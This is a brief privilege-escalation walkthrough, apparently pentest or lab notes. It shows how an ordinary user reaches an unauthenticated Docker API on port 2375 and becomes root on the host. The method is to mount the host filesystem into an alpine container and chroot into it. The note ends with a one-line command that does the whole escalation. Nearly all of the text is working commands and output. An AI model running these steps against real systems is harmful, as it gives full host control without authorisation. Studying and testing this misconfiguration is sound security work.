Docker - Escalation of privilege - Misconfigured Docker Socket
- Escalation
Who I am:
whoami john
List all processes listening on TCP ports
netstat -tlp
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 localhost:2375 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:ssh 0.0.0.0:* LISTEN - tcp6 0 0 [::]:ssh [::]:* LISTEN -
- Port 2375: Docker API unencrypted
- Port 2376: Docker API encrypted
Check if port 2375 is connected to Docker:
curl localhost:2375/version
{"Platform":{"Name":"Docker Engine - Community"},
...
The Docker client is installed on the machine and uses the default port 2375. Now let's configure the Docker client to use TCP.
export DOCKER_HOST="tcp://localhost:2375"
https://docs.docker.com/engine/reference/commandline/cli/#environment-variables
Start a Container and mount the root of the host machine on a directory of the Container.
docker run -it -v /:/mnt alpine bash
Once inside the container:
chroot /mnt bash
Who I am:
whoami root
In one line:
docker run -it --rm -v /:/mnt alpine chroot /mnt bash